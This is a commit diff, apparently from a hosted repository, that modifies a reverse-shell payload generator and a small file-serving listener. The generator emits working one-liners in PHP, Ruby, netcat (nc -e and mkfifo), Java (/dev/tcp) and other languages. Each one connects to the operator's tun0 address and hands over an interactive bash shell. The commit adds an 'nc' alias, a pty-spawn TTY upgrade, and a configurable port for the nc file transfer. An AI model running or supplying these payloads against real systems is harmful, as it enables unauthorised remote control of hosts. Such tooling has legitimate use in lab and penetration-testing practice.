Rev Shell tty, upload file variable port
This commit is contained in:
parent
a0476d4c17
commit
fa84b17e4f
@ -27,7 +27,7 @@ def generatePayload(type, local_address, port):
|
|||||||
return "php -r '$sock=fsockopen(\"%s\",%d);exec(\"/bin/bash -i <&3 >&3 2>&3\");'" % (local_address, port)
|
return "php -r '$sock=fsockopen(\"%s\",%d);exec(\"/bin/bash -i <&3 >&3 2>&3\");'" % (local_address, port)
|
||||||
elif type == "ruby":
|
elif type == "ruby":
|
||||||
return "ruby -rsocket -e'f=TCPSocket.open(\"%s\",%d).to_i;exec sprintf(\"/bin/bash -i <&%d >&%d 2>&%d\",f,f,f)'" % (local_address, port)
|
return "ruby -rsocket -e'f=TCPSocket.open(\"%s\",%d).to_i;exec sprintf(\"/bin/bash -i <&%d >&%d 2>&%d\",f,f,f)'" % (local_address, port)
|
||||||
elif type == "netcat":
|
elif type == "netcat" or type == "nc":
|
||||||
return "nc -e /bin/bash %s %d\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc %s %d >/tmp/f" % (local_address, port, local_address, port)
|
return "nc -e /bin/bash %s %d\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc %s %d >/tmp/f" % (local_address, port, local_address, port)
|
||||||
elif type == "java":
|
elif type == "java":
|
||||||
return "r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/%s/%d;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()" % (local_address, port)
|
return "r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/%s/%d;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()" % (local_address, port)
|
||||||
@ -48,10 +48,11 @@ if __name__ == "__main__":
|
|||||||
|
|
||||||
if payload is None:
|
if payload is None:
|
||||||
print("Unknown payload type: %s" % payload_type)
|
print("Unknown payload type: %s" % payload_type)
|
||||||
print("Supported types: bash, perl, python[2|3], php, ruby, netcat, java, xterm")
|
print("Supported types: bash, perl, python[2|3], php, ruby, netcat|nc, java, xterm")
|
||||||
exit(1)
|
exit(1)
|
||||||
|
|
||||||
print("---PAYLOAD---\n%s\n---PAYLOAD---\n" % payload)
|
tty = "python -c 'import pty; pty.spawn(\"/bin/bash\")"
|
||||||
|
print("---PAYLOAD---\n%s\n---TTY---\n%s\n---------\n" % (payload, tty))
|
||||||
|
|
||||||
if payload_type == "xterm":
|
if payload_type == "xterm":
|
||||||
print("You need to run the following commands (not tested):")
|
print("You need to run the following commands (not tested):")
|
||||||
|
@ -3,7 +3,7 @@ import sys
|
|||||||
import netifaces as ni
|
import netifaces as ni
|
||||||
|
|
||||||
if len(sys.argv) < 2:
|
if len(sys.argv) < 2:
|
||||||
print("Usage: %s <file>" % sys.argv[0])
|
print("Usage: %s <file> [port]" % sys.argv[0])
|
||||||
exit(1)
|
exit(1)
|
||||||
|
|
||||||
# Create a TCP/IP socket
|
# Create a TCP/IP socket
|
||||||
@ -14,16 +14,17 @@ interface = "tun0"
|
|||||||
if not interface in ni.interfaces():
|
if not interface in ni.interfaces():
|
||||||
interface = ni.interfaces()[0]
|
interface = ni.interfaces()[0]
|
||||||
|
|
||||||
|
|
||||||
addresses = ni.ifaddresses(interface)
|
addresses = ni.ifaddresses(interface)
|
||||||
address = addresses[next(iter(addresses))][0]["addr"]
|
address = addresses[next(iter(addresses))][0]["addr"]
|
||||||
|
|
||||||
# Bind the socket to the port
|
# Bind the socket to the port
|
||||||
server_address = (address, 8888)
|
port = 8888 if len(sys.argv) < 3 else int(sys.argv[2])
|
||||||
print('starting up on %s port %s' % server_address)
|
server_address = (address, port)
|
||||||
sock.bind(server_address)
|
sock.bind(server_address)
|
||||||
|
|
||||||
sock.listen(1)
|
sock.listen(1)
|
||||||
|
print("Now listening, download file using:")
|
||||||
|
print('nc %s %d > %s' % (address, port, os.path.basename(FILENAME)))
|
||||||
|
print()
|
||||||
|
|
||||||
while True:
|
while True:
|
||||||
# Wait for a connection
|
# Wait for a connection
|
||||||
|
Loading…
Reference in New Issue
Block a user